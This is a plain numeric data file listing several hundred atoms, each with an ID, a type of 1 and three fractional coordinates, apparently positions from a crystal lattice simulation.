1262 1 0.433606 0.936288 0.122994
1297 1 0.498803 0.504573 0.251608
391 1 0.187404 0.999118 0.431824
557 1 0.37392 0.118721 0.498954
1153 1 0.00459273 0.494908 0.129415
136 1 0.126202 0.0553161 0.18993
163 1 0.063299 0.118718 0.187807
258 1 0.0611069 0.0584147 0.248711
264 1 0.124113 0.0614263 0.311048
291 1 0.062736 0.121139 0.31029
293 1 0.120955 0.120757 0.24694
395 1 0.31049 0.996986 0.43848
140 1 0.253893 0.0587744 0.186075
167 1 0.190556 0.121815 0.184051
171 1 0.312374 0.12346 0.188044
262 1 0.185705 0.0606897 0.243929
266 1 0.318322 0.0643545 0.246972
268 1 0.254636 0.0607924 0.303566
295 1 0.188235 0.120335 0.310605
297 1 0.244366 0.126288 0.245577
299 1 0.307617 0.125499 0.305123
267 1 0.309122 1.00017 0.313908
139 1 0.314734 0.991987 0.190697
263 1 0.185965 0.00462774 0.30789
1514 1 0.316488 0.935734 0.374018
144 1 0.370596 0.0619032 0.18186
175 1 0.441004 0.121214 0.183745
270 1 0.43291 0.0621934 0.246724
272 1 0.376497 0.0602291 0.312762
301 1 0.375449 0.130513 0.251919
303 1 0.438854 0.131573 0.312911
269 1 0.374654 -0.00598033 0.252123
143 1 0.437153 0.997103 0.182541
271 1 0.436365 -0.000629748 0.30798
1510 1 0.182019 0.943842 0.372819
617 1 0.250249 0.372187 0.497785
168 1 0.122791 0.187429 0.183995
195 1 0.0644383 0.248276 0.185065
200 1 0.122152 0.310914 0.1798
290 1 0.0639428 0.185573 0.250313
296 1 0.126817 0.17894 0.306485
322 1 0.0559255 0.305244 0.245609
323 1 0.0654555 0.245803 0.306491
325 1 0.127957 0.249944 0.246626
328 1 0.116928 0.309366 0.308294
172 1 0.2443 0.185926 0.182907
199 1 0.183147 0.251222 0.183258
203 1 0.312839 0.255755 0.183768
204 1 0.25383 0.318898 0.186369
294 1 0.185169 0.186456 0.242955
298 1 0.315348 0.194168 0.246951
300 1 0.246326 0.189627 0.307702
326 1 0.183193 0.316005 0.244495
327 1 0.1863 0.247557 0.312364
329 1 0.244554 0.251722 0.241651
330 1 0.313695 0.316519 0.247436
331 1 0.309809 0.253944 0.304844
332 1 0.246241 0.313833 0.307104
176 1 0.380015 0.190715 0.189758
207 1 0.437748 0.257997 0.187061
208 1 0.371477 0.317926 0.184364
302 1 0.437641 0.188309 0.24775
304 1 0.376547 0.193029 0.314082
333 1 0.377482 0.252986 0.249123
334 1 0.439004 0.317249 0.25003
335 1 0.437498 0.252285 0.315218
336 1 0.372407 0.317601 0.307845
1516 1 0.248167 0.936888 0.429475
1511 1 0.185505 0.882182 0.435153
1515 1 0.308149 0.873553 0.444158
1513 1 0.247877 0.874089 0.374604
227 1 0.0625331 0.369948 0.189446
232 1 0.121308 0.433538 0.188408
354 1 0.0612573 0.43898 0.247824
355 1 0.057687 0.37272 0.315501
357 1 0.121019 0.372975 0.250506
360 1 0.129054 0.43409 0.310108
1285 1 0.123928 0.499269 0.254047
585 1 0.252917 0.25314 0.499642
231 1 0.183807 0.370497 0.182229
235 1 0.309773 0.378042 0.183419
236 1 0.251048 0.444848 0.185051
358 1 0.186144 0.428092 0.24612
359 1 0.185041 0.372116 0.315725
361 1 0.251042 0.378036 0.24217
362 1 0.308691 0.43621 0.248735
363 1 0.311324 0.377282 0.305445
364 1 0.250553 0.434796 0.309524
1163 1 0.31277 0.506061 0.193779
1289 1 0.246192 0.497117 0.251662
1291 1 0.307341 0.502717 0.305753
17 1 0.503331 1.00092 -5.03253e-05
239 1 0.440343 0.374374 0.18613
240 1 0.376163 0.439988 0.186013
365 1 0.36885 0.378075 0.24027
366 1 0.434448 0.436328 0.247742
367 1 0.432639 0.375712 0.308075
368 1 0.373493 0.438174 0.306483
1167 1 0.436377 0.50294 0.186794
1295 1 0.434196 0.501743 0.316836
1293 1 0.378371 0.506905 0.253384
513 1 -0.00189259 0.00212709 0.500858
100 1 0.00119801 0.433537 0.0591184
9 1 0.256534 -0.00239472 -0.000735999
1283 1 0.0554452 0.499757 0.314319
1155 1 0.0640344 0.496992 0.188687
1160 1 0.120713 0.561963 0.189574
1187 1 0.0555345 0.624932 0.193093
1282 1 0.0617456 0.562975 0.252934
1288 1 0.121432 0.561162 0.31374
1315 1 0.0621049 0.631199 0.307189
1317 1 0.122939 0.62413 0.252207
1482 1 0.313295 0.812849 0.381979
1287 1 0.187668 0.494741 0.312467
1159 1 0.184026 0.49741 0.193531
1164 1 0.246418 0.561055 0.18888
1191 1 0.183611 0.625925 0.189048
1195 1 0.31032 0.627134 0.187905
1286 1 0.18642 0.561543 0.251511
1290 1 0.31083 0.565743 0.251574
1292 1 0.242998 0.561689 0.306627
1319 1 0.183334 0.621946 0.314476
1321 1 0.24408 0.625062 0.248175
1323 1 0.305154 0.622023 0.312297
389 1 0.119706 0.00123357 0.373769
1168 1 0.372108 0.562352 0.18918
1199 1 0.435448 0.627945 0.185547
1294 1 0.437751 0.569058 0.250806
1296 1 0.375338 0.570543 0.31563
1325 1 0.37646 0.626183 0.249524
1327 1 0.439703 0.625323 0.312478
578 1 0.0636694 0.313191 0.496664
1506 1 0.0637973 0.938676 0.371425
1512 1 0.121737 0.941106 0.440084
1509 1 0.127189 0.878438 0.372776
1192 1 0.123046 0.688033 0.187845
1219 1 0.0613539 0.752188 0.190863
1224 1 0.127652 0.812703 0.186383
1314 1 0.0591187 0.693024 0.251135
1320 1 0.125504 0.687539 0.315291
1346 1 0.0624753 0.814741 0.251216
1347 1 0.0631136 0.753759 0.315603
1349 1 0.12229 0.751867 0.25143
1352 1 0.126677 0.81769 0.310533
1196 1 0.24688 0.688359 0.18463
1223 1 0.182295 0.752967 0.181997
1227 1 0.30992 0.748346 0.186609
1228 1 0.248295 0.816616 0.184981
1318 1 0.183483 0.685925 0.246744
1322 1 0.311265 0.683378 0.251826
1324 1 0.250927 0.687423 0.312015
1350 1 0.186261 0.81377 0.242094
1351 1 0.185594 0.753797 0.309324
1353 1 0.245452 0.752787 0.248648
1354 1 0.309983 0.810458 0.251481
1355 1 0.309267 0.750401 0.31391
1356 1 0.250346 0.812691 0.312997
1200 1 0.371615 0.686802 0.189665
1231 1 0.438037 0.745254 0.184269
1232 1 0.372234 0.808338 0.186221
1326 1 0.439108 0.686839 0.248975
1328 1 0.37254 0.685192 0.312443
1357 1 0.374662 0.74914 0.252853
1358 1 0.436601 0.816136 0.252206
1359 1 0.434355 0.752433 0.307619
1360 1 0.37066 0.815408 0.311074
1507 1 0.0585493 0.884574 0.436326
261 1 0.126547 0.998641 0.249606
259 1 0.0594185 1.0002 0.312242
131 1 0.0649599 -0.000253709 0.189757
1251 1 0.0668458 0.875254 0.187111
1256 1 0.125963 0.937016 0.183067
1378 1 0.0623391 0.939438 0.249718
1379 1 0.0599284 0.876582 0.313747
1381 1 0.126176 0.8777 0.251222
1384 1 0.128308 0.938884 0.309896
1581 1 0.374494 0.624682 0.501411
1479 1 0.18626 0.751787 0.439931
135 1 0.189054 0.997703 0.189372
265 1 0.251625 0.998369 0.248092
1255 1 0.187301 0.87938 0.18865
1259 1 0.316432 0.873808 0.187525
1260 1 0.251329 0.938428 0.186274
1382 1 0.187403 0.935852 0.250142
1383 1 0.188878 0.879769 0.312023
1385 1 0.250392 0.873387 0.249988
1386 1 0.31777 0.937031 0.254483
1387 1 0.307981 0.877218 0.315473
1388 1 0.246757 0.943671 0.315454
1450 1 0.312723 0.682158 0.376817
1452 1 0.253781 0.683369 0.436627
1263 1 0.433699 0.873106 0.188809
1264 1 0.374185 0.938183 0.185338
1389 1 0.371537 0.871141 0.247088
1390 1 0.436308 0.939597 0.249144
1391 1 0.434023 0.874305 0.311302
1392 1 0.375665 0.933085 0.310433
387 1 0.0616342 -0.00413245 0.436958
386 1 0.061482 0.0645407 0.377282
392 1 0.125507 0.062929 0.433097
419 1 0.0623716 0.124048 0.440118
421 1 0.121817 0.123526 0.375256
1446 1 0.187947 0.694219 0.378533
49 1 0.503626 0.122465 -0.00107789
393 1 0.253311 0.00025499 0.375897
390 1 0.187879 0.0606267 0.372048
394 1 0.308753 0.0645111 0.371937
396 1 0.24491 0.0633844 0.431491
423 1 0.184229 0.128727 0.43889
425 1 0.247658 0.128347 0.370059
427 1 0.309858 0.124829 0.428876
1249 1 0.00151478 0.877134 0.125833
1345 1 -0.00295084 0.756632 0.25095
397 1 0.372053 0.996971 0.368989
1481 1 0.255394 0.752909 0.378186
399 1 0.433472 0.998522 0.431204
398 1 0.437591 0.0632107 0.374811
400 1 0.372645 0.0628344 0.433534
429 1 0.377469 0.123785 0.368173
431 1 0.438543 0.122898 0.436122
484 1 0.00409659 0.440692 0.436626
1441 1 -0.0068194 0.627821 0.372784
1265 1 0.494599 0.874101 0.122291
1442 1 0.0664961 0.688396 0.376874
1480 1 0.123934 0.81997 0.440747
418 1 0.0637774 0.180642 0.375111
424 1 0.123416 0.188513 0.440106
450 1 0.0544253 0.305643 0.370747
451 1 0.0601029 0.24719 0.438875
453 1 0.123568 0.242505 0.375501
456 1 0.126368 0.308182 0.43273
1425 1 0.497515 0.501303 0.373066
422 1 0.187695 0.184892 0.37189
426 1 0.314613 0.189756 0.368818
428 1 0.251995 0.191165 0.437135
454 1 0.190124 0.311263 0.378359
455 1 0.192624 0.250081 0.437269
457 1 0.253342 0.248993 0.372108
458 1 0.306355 0.310842 0.365423
459 1 0.316976 0.254395 0.433986
460 1 0.250403 0.313012 0.436974
385 1 0.000979362 0.00155035 0.380446
625 1 0.503331 0.38075 0.493764
1457 1 0.500379 0.6232 0.376257
1486 1 0.441174 0.811765 0.372593
430 1 0.436814 0.190487 0.375901
432 1 0.369854 0.185121 0.436502
461 1 0.379987 0.252477 0.373166
462 1 0.435111 0.314155 0.37515
463 1 0.435808 0.248453 0.438508
464 1 0.372998 0.322606 0.430709
1485 1 0.370153 0.750663 0.376384
613 1 0.122453 0.370397 0.499864
1487 1 0.436175 0.751309 0.436427
483 1 0.0670427 0.374222 0.431024
488 1 0.124863 0.44224 0.439126
485 1 0.127392 0.372986 0.373951
482 1 0.0674446 0.440693 0.373924
1411 1 0.064305 0.508125 0.439929
1456 1 0.378168 0.684986 0.436154
492 1 0.25016 0.439669 0.439326
490 1 0.312402 0.438412 0.369941
489 1 0.251863 0.376475 0.372708
491 1 0.307602 0.378521 0.430293
486 1 0.189511 0.437104 0.37443
487 1 0.187667 0.374361 0.437045
1415 1 0.188102 0.497499 0.435269
13 1 0.374241 -0.00255023 -0.000359928
1454 1 0.435673 0.690608 0.368103
494 1 0.436172 0.433352 0.375688
496 1 0.366255 0.438591 0.440752
493 1 0.370309 0.378001 0.365833
495 1 0.438949 0.373918 0.440165
1423 1 0.43322 0.498099 0.438377
1421 1 0.37631 0.500472 0.379461
1448 1 0.124443 0.69231 0.439071
388 1 -0.00533016 0.0629443 0.435993
1488 1 0.380978 0.814464 0.438349
1541 1 0.126678 0.502835 0.500573
1478 1 0.190813 0.808273 0.370274
1413 1 0.123012 0.502973 0.371588
1410 1 0.0607055 0.562531 0.37427
1416 1 0.126555 0.564325 0.440526
1443 1 0.0551028 0.628838 0.434272
1445 1 0.124618 0.628114 0.379744
1417 1 0.244448 0.497896 0.377885
1419 1 0.308974 0.500663 0.437795
1420 1 0.252069 0.559832 0.436869
1451 1 0.312574 0.618023 0.437868
1449 1 0.247743 0.620668 0.369153
1447 1 0.188116 0.626933 0.434837
1414 1 0.18501 0.561148 0.374979
1418 1 0.312203 0.560582 0.375451
1474 1 0.0650418 0.810559 0.375563
1329 1 0.50307 0.626445 0.249104
1484 1 0.240829 0.818129 0.439789
1453 1 0.372352 0.62291 0.378206
1424 1 0.376493 0.558007 0.439394
1455 1 0.43975 0.622962 0.443268
1422 1 0.438703 0.564425 0.373907
1475 1 0.0625113 0.752007 0.436975
1483 1 0.313634 0.751432 0.440339
1477 1 0.12918 0.754293 0.375045
1428 1 0.501697 0.563966 0.439711
1377 1 0.00204575 0.88003 0.253538
581 1 0.124903 0.250088 0.500275
1508 1 -0.00273591 0.939249 0.439701
46 1 0.441079 0.191083 0.0010372
161 1 0.000474957 0.121225 0.123844
97 1 -0.000383631 0.375334 -0.00143242
1140 1 0.498168 0.936939 0.0639151
1348 1 0.000430207 0.820489 0.314469
554 1 0.308173 0.187619 0.503906
590 1 0.434946 0.315694 0.50067
1060 1 0.000283365 0.687329 0.0698193
558 1 0.434819 0.18843 0.498072
1613 1 0.375005 0.747603 0.49975
372 1 0.501764 0.436281 0.31196
481 1 -0.00368022 0.377331 0.376243
1252 1 -0.0027364 0.941933 0.190192
433 1 0.497631 0.128759 0.37169
244 1 0.493577 0.43504 0.191685
1057 1 0.00204069 0.620631 0.00297113
1130 1 0.315573 0.937904 -0.00502408
1649 1 0.498916 0.874683 0.501422
228 1 -0.00200904 0.434553 0.186008
1028 1 0.00315237 0.558347 0.0668672
1393 1 0.500582 0.879586 0.253306
1092 1 -0.00146861 0.81369 0.066918
1605 1 0.123715 0.753241 0.499682
621 1 0.373023 0.378521 0.499891
1606 1 0.182793 0.817679 0.503344
582 1 0.184832 0.310355 0.497341
1129 1 0.250855 0.876582 -0.00081003
622 1 0.436628 0.435307 0.494339
1570 1 0.0557331 0.687147 0.496177
525 1 0.375579 0.000476324 0.49662
1573 1 0.126049 0.62329 0.498433
106 1 0.318575 0.432571 0.00458534
1569 1 -0.00179041 0.626512 0.503961
1574 1 0.187604 0.688748 0.496477
553 1 0.248271 0.119414 0.49558
1638 1 0.181406 0.939375 0.495799
521 1 0.248845 0.997398 0.497308
1134 1 0.436521 0.934922 0.00318348
514 1 0.0639809 0.0624754 0.493387
1033 1 0.251168 0.499266 0.000795641
81 1 0.506075 0.253019 0.00445748
1097 1 0.249724 0.746816 -0.00142485
518 1 0.183962 0.0664155 0.498152
614 1 0.182307 0.431586 0.498387
41 1 0.255728 0.126562 0.000835616
110 1 0.444605 0.432251 -0.00183524
1061 1 0.123987 0.62438 0.0031953
520 1 0.1252 0.0614843 0.555557
547 1 0.0620314 0.117144 0.557257
642 1 0.0695546 0.0614315 0.62409
677 1 0.124684 0.123272 0.622116
1700 1 0.00101246 0.686352 0.689902
2032 1 0.382164 0.938479 0.932941
2030 1 0.438879 0.93587 0.870083
772 1 0.000769592 0.0639141 0.80914
524 1 0.249243 0.0578783 0.564704
551 1 0.186384 0.121689 0.562887
555 1 0.309132 0.119411 0.56206
646 1 0.185935 0.0632394 0.628386
650 1 0.316229 0.0577595 0.627406
681 1 0.248625 0.11828 0.624511
523 1 0.31149 0.999273 0.561799
516 1 0.00543394 0.0619777 0.558973
649 1 0.256109 0.998104 0.622261
528 1 0.370896 0.0623663 0.558815
559 1 0.439948 0.120926 0.564551
654 1 0.437496 0.060425 0.626761
685 1 0.37294 0.121981 0.62437
653 1 0.373905 0.996316 0.623087
552 1 0.128424 0.188985 0.558243
579 1 0.0658063 0.254733 0.562862
584 1 0.123058 0.315951 0.563262
674 1 0.069042 0.184711 0.617286
706 1 0.0632727 0.309538 0.627352
709 1 0.126787 0.247377 0.623286
2029 1 0.373736 0.871884 0.878657
1668 1 -0.00322596 0.556349 0.687148
556 1 0.248287 0.182616 0.565385
583 1 0.191475 0.250634 0.562061
587 1 0.312262 0.254455 0.563499
588 1 0.25086 0.319155 0.559572
678 1 0.182991 0.185403 0.626886
682 1 0.310511 0.190577 0.624665
710 1 0.183807 0.310926 0.629449
713 1 0.246675 0.252406 0.626801
714 1 0.30826 0.312735 0.626267
721 1 0.499692 0.251525 0.627053
1602 1 0.0634611 0.815875 0.501439
560 1 0.374148 0.182946 0.561241
591 1 0.438979 0.251241 0.564756
592 1 0.37642 0.314363 0.564962
686 1 0.43576 0.189289 0.628774
717 1 0.377889 0.248524 0.625526
718 1 0.438718 0.311342 0.625345
2031 1 0.437497 0.873803 0.934551
1972 1 0.5019 0.691596 0.935257
1542 1 0.190403 0.560185 0.501972
1122 1 0.0643881 0.938714 0.995185
1577 1 0.249501 0.622202 0.493308
611 1 0.0647631 0.381704 0.563061
616 1 0.124809 0.44203 0.564227
738 1 0.067576 0.435805 0.624297
741 1 0.120532 0.369286 0.626147
1539 1 0.0614148 0.496667 0.5546
785 1 0.496098 0.00729805 0.755923
615 1 0.183843 0.369891 0.562052
619 1 0.31387 0.375183 0.560677
620 1 0.246567 0.434126 0.561779
742 1 0.187952 0.435324 0.62375
745 1 0.250269 0.375017 0.62337
746 1 0.307137 0.437961 0.625603
1547 1 0.310666 0.493485 0.564088
1637 1 0.120413 0.877746 0.498637
1841 1 0.500554 0.617498 0.74947
1034 1 0.315394 0.565924 1.00062
586 1 0.313461 0.314567 0.500037
623 1 0.439689 0.3762 0.554473
624 1 0.378293 0.433515 0.562361
749 1 0.376815 0.37412 0.625711
750 1 0.441483 0.433155 0.623068
1551 1 0.440196 0.497052 0.562824
1545 1 0.247598 0.500915 0.503279
1677 1 0.377979 0.496442 0.618921
5 1 0.125092 -0.00122863 0.999796
2001 1 0.500095 0.751921 0.868954
2028 1 0.253593 0.938916 0.939473
1620 1 0.498964 0.808977 0.564461
2033 1 0.49929 0.87612 0.874744
1669 1 0.126548 0.49681 0.625604
1544 1 0.121288 0.558284 0.565014
1571 1 0.0649863 0.622401 0.559259
1666 1 0.066144 0.566567 0.626786
1701 1 0.127124 0.63037 0.621908
529 1 0.496955 0.99654 0.500628
1921 1 0.00747398 0.495076 0.87411
2022 1 0.191032 0.94071 0.881071
2023 1 0.185459 0.8737 0.931692
1543 1 0.18956 0.496925 0.564153
1673 1 0.246998 0.496656 0.625166
1548 1 0.246164 0.563319 0.567943
1575 1 0.189166 0.627398 0.555903
1579 1 0.311763 0.625529 0.56077
1670 1 0.183615 0.564274 0.625936
1674 1 0.313972 0.562675 0.62347
1705 1 0.253001 0.631474 0.623704
913 1 0.502791 -0.000818464 0.873867
1101 1 0.372137 0.745685 0.998709
2026 1 0.315568 0.938672 0.876853
1552 1 0.373497 0.56169 0.563755
1583 1 0.442366 0.622568 0.557136
1678 1 0.440243 0.558172 0.628136
1709 1 0.38304 0.619133 0.62553
69 1 0.125565 0.250724 0.999599
1956 1 -0.000383628 0.682693 0.942352
1576 1 0.121276 0.686595 0.554888
1603 1 0.0612514 0.75145 0.56451
1608 1 0.119952 0.815358 0.562637
1698 1 0.0618077 0.685391 0.621662
1730 1 0.0621077 0.813463 0.627909
1733 1 0.12351 0.746574 0.624574
2025 1 0.254117 0.872117 0.881552
1889 1 0.00289885 0.8733 0.749938
1580 1 0.246303 0.686729 0.560345
1607 1 0.182497 0.749602 0.561968
1611 1 0.312015 0.747644 0.561952
1612 1 0.249163 0.811222 0.561529
1702 1 0.18781 0.684923 0.62066
1706 1 0.315301 0.684025 0.619984
1734 1 0.191343 0.812623 0.623524
1737 1 0.250353 0.748512 0.619576
1738 1 0.313558 0.810855 0.625193
38 1 0.188321 0.181934 0.998308
1828 1 -0.000513273 0.685702 0.819317
618 1 0.306673 0.436612 0.497459
2036 1 0.495081 0.938197 0.934182
2027 1 0.314586 0.873128 0.941012
903 1 0.190126 0.00398837 0.936317
1584 1 0.376808 0.688728 0.564426
1615 1 0.435037 0.755162 0.5658
1616 1 0.371832 0.81082 0.564382
1710 1 0.439745 0.682303 0.631958
1741 1 0.376171 0.745633 0.628114
1742 1 0.432461 0.812463 0.625196
1745 1 0.496975 0.752634 0.625064
549 1 0.123384 0.12405 0.497774
515 1 0.0658499 0.00152715 0.558977
645 1 0.126165 -0.00134032 0.624454
1635 1 0.0614402 0.873821 0.56618
1640 1 0.123325 0.933014 0.564167
1762 1 0.0631879 0.936491 0.62538
1765 1 0.127916 0.879116 0.625718
899 1 0.0641856 0.00329544 0.932782
1844 1 0.496915 0.687471 0.812969
78 1 0.439879 0.31461 0.997363
519 1 0.179943 0.996041 0.56107
1639 1 0.19275 0.875621 0.56564
1643 1 0.312943 0.872063 0.565332
1644 1 0.251443 0.939321 0.563903
1766 1 0.189092 0.94488 0.63143
1769 1 0.25143 0.871309 0.628565
1770 1 0.311967 0.933079 0.622045
1609 1 0.247552 0.747915 0.497445
2021 1 0.120144 0.88256 0.874696
527 1 0.434637 1.00254 0.560988
1647 1 0.435411 0.871619 0.561278
1648 1 0.371687 0.933975 0.55749
1773 1 0.372113 0.869834 0.626625
1774 1 0.437131 0.937785 0.622254
648 1 0.128144 0.060344 0.689507
675 1 0.0658383 0.123003 0.687604
770 1 0.0649177 0.0584914 0.749177
776 1 0.129528 0.0639422 0.814545
803 1 0.0627353 0.123328 0.813568
805 1 0.124035 0.122701 0.756365
2004 1 0.500024 0.806016 0.935548
652 1 0.252486 0.0627011 0.693495
679 1 0.189165 0.124869 0.687546
683 1 0.311096 0.12053 0.685537
774 1 0.185466 0.0635735 0.751981
778 1 0.318642 0.0637514 0.747924
780 1 0.251565 0.0682328 0.804002
807 1 0.187824 0.127145 0.818492
809 1 0.256308 0.132971 0.75025
811 1 0.313425 0.128423 0.812978
651 1 0.311877 1.00376 0.689711
775 1 0.188251 1.00088 0.812737
656 1 0.374677 0.0598313 0.684786
687 1 0.43767 0.129643 0.685866
782 1 0.434758 0.0684076 0.748523
784 1 0.374975 0.0638139 0.809596
813 1 0.379181 0.129412 0.749224
815 1 0.437811 0.131277 0.813431
655 1 0.438101 0.999534 0.683654
781 1 0.378789 0.000257986 0.753879
2024 1 0.122624 0.94071 0.936278
2018 1 0.0634879 0.941297 0.874987
2019 1 0.0635621 0.876498 0.934276
680 1 0.125075 0.183995 0.68791
707 1 0.0617235 0.245558 0.68734
712 1 0.124222 0.30845 0.687831
802 1 0.058063 0.187908 0.754036
808 1 0.120604 0.185896 0.815781
834 1 0.0655173 0.310641 0.751144
835 1 0.0638357 0.250911 0.812259
837 1 0.124285 0.245025 0.751237
840 1 0.128938 0.310005 0.811305
74 1 0.314128 0.31754 0.998792
684 1 0.24331 0.185909 0.688476
711 1 0.177855 0.247423 0.691821
715 1 0.314849 0.251358 0.685957
716 1 0.248559 0.314482 0.688561
806 1 0.182076 0.18509 0.756064
810 1 0.314632 0.194219 0.751943
812 1 0.251294 0.19536 0.808977
838 1 0.193888 0.310782 0.75041
839 1 0.186394 0.250827 0.813107
841 1 0.250045 0.24792 0.746821
842 1 0.310415 0.318716 0.749517
843 1 0.310144 0.253408 0.814508
844 1 0.25293 0.312187 0.81184
688 1 0.371408 0.185408 0.686972
719 1 0.441456 0.252327 0.687947
720 1 0.377403 0.312806 0.687223
814 1 0.437544 0.191535 0.749737
816 1 0.379531 0.191721 0.809123
845 1 0.373657 0.257614 0.746037
846 1 0.437825 0.316792 0.748212
847 1 0.440331 0.250742 0.8137
848 1 0.380056 0.309283 0.812902
901 1 0.128005 1.002 0.87877
689 1 0.502466 0.127875 0.629971
739 1 0.0590572 0.372999 0.685292
744 1 0.125998 0.435789 0.686343
866 1 0.0630369 0.435272 0.744382
867 1 0.0661926 0.370599 0.816054
869 1 0.126378 0.375738 0.749024
872 1 0.125712 0.435658 0.816784
1795 1 0.0673327 0.493409 0.813619
1667 1 0.0658716 0.497613 0.686039
1797 1 0.125086 0.501089 0.752967
788 1 0.494573 0.0655753 0.815541
743 1 0.185363 0.369822 0.685931
747 1 0.311593 0.373152 0.685958
748 1 0.248053 0.438257 0.6876
870 1 0.186172 0.440431 0.752426
871 1 0.190672 0.374886 0.811558
873 1 0.246638 0.377787 0.744758
874 1 0.311009 0.433426 0.747932
875 1 0.313853 0.372448 0.812982
876 1 0.249846 0.441052 0.814486
1671 1 0.18509 0.49641 0.690037
1968 1 0.376138 0.689756 0.932822
751 1 0.435219 0.37501 0.685503
752 1 0.373261 0.433558 0.682414
877 1 0.376586 0.378119 0.750996
878 1 0.442056 0.440662 0.749711
879 1 0.434425 0.378142 0.812494
880 1 0.37375 0.436949 0.812714
1679 1 0.441082 0.497717 0.683315
1805 1 0.380133 0.49615 0.742611
1966 1 0.439915 0.683673 0.875231
1672 1 0.129863 0.556937 0.687069
1699 1 0.0679603 0.626171 0.684144
1794 1 0.0608389 0.559489 0.747781
1800 1 0.124687 0.565789 0.815442
1827 1 0.0611083 0.626375 0.814135
1829 1 0.124351 0.622965 0.75111
1803 1 0.313956 0.499045 0.805342
1675 1 0.315422 0.499847 0.679389
1801 1 0.24954 0.498486 0.745632
1799 1 0.183453 0.50165 0.814458
1676 1 0.24704 0.560233 0.682967
1703 1 0.182789 0.624701 0.683993
1707 1 0.310272 0.621649 0.680478
1798 1 0.192547 0.561008 0.747299
1802 1 0.313432 0.559943 0.736448
1804 1 0.255885 0.559547 0.804673
1831 1 0.188803 0.620465 0.812385
1833 1 0.252584 0.621464 0.744144
1835 1 0.31339 0.623473 0.808585
1807 1 0.444045 0.496419 0.812799
1680 1 0.375743 0.557727 0.687213
1711 1 0.434572 0.618982 0.692617
1806 1 0.438702 0.556047 0.752676
1808 1 0.374728 0.558782 0.811723
1837 1 0.369941 0.623853 0.749582
1839 1 0.442174 0.625764 0.813109
1098 1 0.311401 0.810499 1.00112
2000 1 0.370608 0.807447 0.937775
1998 1 0.439687 0.810809 0.873357
1997 1 0.372108 0.74922 0.873494
1704 1 0.124216 0.688792 0.689716
1731 1 0.0610832 0.74718 0.68525
1736 1 0.127672 0.816897 0.687367
1826 1 0.0660012 0.686859 0.748803
1832 1 0.120691 0.686161 0.812593
1858 1 0.06687 0.815638 0.749184
1859 1 0.060878 0.755193 0.811528
1861 1 0.123573 0.750358 0.751073
1864 1 0.125723 0.814094 0.815879
1708 1 0.249107 0.687188 0.689129
1735 1 0.18336 0.75312 0.687098
1739 1 0.308805 0.749167 0.684725
1740 1 0.25103 0.812255 0.688481
1830 1 0.183798 0.679317 0.749402
1834 1 0.311282 0.683835 0.744492
1836 1 0.246313 0.685096 0.807236
1862 1 0.185159 0.815209 0.751692
1863 1 0.184277 0.746929 0.812556
1865 1 0.256086 0.753628 0.753478
1866 1 0.315212 0.812857 0.749824
1867 1 0.316363 0.754449 0.818707
1868 1 0.24399 0.812049 0.812279
1999 1 0.438136 0.749902 0.936928
1712 1 0.376723 0.678836 0.686753
1743 1 0.437488 0.752592 0.686741
1744 1 0.377647 0.807766 0.690475
1838 1 0.443063 0.683938 0.748302
1840 1 0.378601 0.687034 0.810061
1869 1 0.374412 0.748409 0.749611
1870 1 0.43531 0.810878 0.751591
1871 1 0.436487 0.749059 0.813649
1872 1 0.374771 0.816162 0.811894
1094 1 0.184275 0.813751 1.00006
1037 1 0.377651 0.500212 1.0059
643 1 0.0627477 0.999088 0.684968
771 1 0.0622834 0.00176828 0.81241
773 1 0.128141 1.00016 0.749953
1763 1 0.064928 0.876625 0.689129
1768 1 0.128783 0.940735 0.688995
1890 1 0.0643719 0.94109 0.748633
1891 1 0.0636711 0.875622 0.81075
1893 1 0.124011 0.875721 0.751191
1896 1 0.122063 0.940665 0.812498
1924 1 -9.15941e-05 0.558299 0.938115
777 1 0.253906 1.00259 0.751776
779 1 0.315163 -4.91504e-05 0.81568
647 1 0.192497 -0.0018102 0.690699
1767 1 0.186667 0.874582 0.686758
1771 1 0.315797 0.872878 0.683573
1772 1 0.255723 0.937383 0.691268
1894 1 0.186952 0.93287 0.753131
1895 1 0.188184 0.878345 0.822254
1897 1 0.248833 0.874148 0.751524
1898 1 0.309811 0.934713 0.757969
1899 1 0.311599 0.871811 0.814511
1900 1 0.252106 0.93861 0.816369
783 1 0.439167 0.00265187 0.812783
1775 1 0.439821 0.87562 0.684281
1776 1 0.375032 0.936154 0.688809
1901 1 0.377669 0.876218 0.753351
1902 1 0.443638 0.936719 0.745094
1903 1 0.442777 0.875933 0.810228
1904 1 0.375997 0.935555 0.811775
1652 1 0.496284 0.942102 0.567092
641 1 0.00583405 -0.000729188 0.626502
898 1 0.0656409 0.0613879 0.872653
904 1 0.128965 0.0615661 0.936436
931 1 0.0646859 0.125792 0.939081
933 1 0.123158 0.1227 0.877064
66 1 0.0667541 0.318446 1.00308
1553 1 0.496333 0.497818 0.495367
905 1 0.252212 -0.000515712 0.873837
907 1 0.316797 0.00256747 0.937643
902 1 0.192867 0.0579331 0.87141
906 1 0.30993 0.0578507 0.873908
908 1 0.255848 0.0661966 0.941086
935 1 0.188536 0.126679 0.934543
937 1 0.255764 0.12635 0.869793
939 1 0.313528 0.128651 0.935081
817 1 0.49848 0.122159 0.747947
1954 1 0.0628528 0.686256 0.880316
911 1 0.44012 -0.00062172 0.936532
1992 1 0.128489 0.803033 0.940007
909 1 0.377323 -0.000555195 0.880394
910 1 0.435144 0.0662903 0.872931
912 1 0.374392 0.0644014 0.932288
941 1 0.373501 0.120075 0.868099
943 1 0.43519 0.121372 0.937937
1989 1 0.122644 0.746169 0.872713
1987 1 0.0566181 0.751223 0.936875
993 1 0.002283 0.375032 0.873466
1825 1 0.00831613 0.621926 0.74935
930 1 0.057479 0.186685 0.875131
936 1 0.124741 0.197046 0.937448
962 1 0.0625304 0.309159 0.87567
963 1 0.0634229 0.253453 0.939809
965 1 0.122379 0.252331 0.875638
968 1 0.125329 0.312801 0.938262
1962 1 0.313662 0.683625 0.869927
596 1 0.50317 0.310605 0.557573
1777 1 0.500341 0.874694 0.619993
1990 1 0.190841 0.803354 0.879944
545 1 0.000210539 0.125893 0.500407
934 1 0.182126 0.191902 0.875103
938 1 0.31078 0.191278 0.87352
940 1 0.252625 0.193488 0.93802
966 1 0.186174 0.310545 0.876022
967 1 0.186962 0.248848 0.942272
969 1 0.248885 0.253433 0.872793
970 1 0.311417 0.310923 0.876214
971 1 0.318257 0.253325 0.933843
972 1 0.249684 0.313198 0.933435
628 1 0.499814 0.43959 0.563793
1986 1 0.0679391 0.817274 0.881029
644 1 -0.00413542 0.059809 0.685675
1764 1 -0.00239757 0.935258 0.689887
564 1 0.496008 0.188126 0.560233
973 1 0.37734 0.246656 0.872191
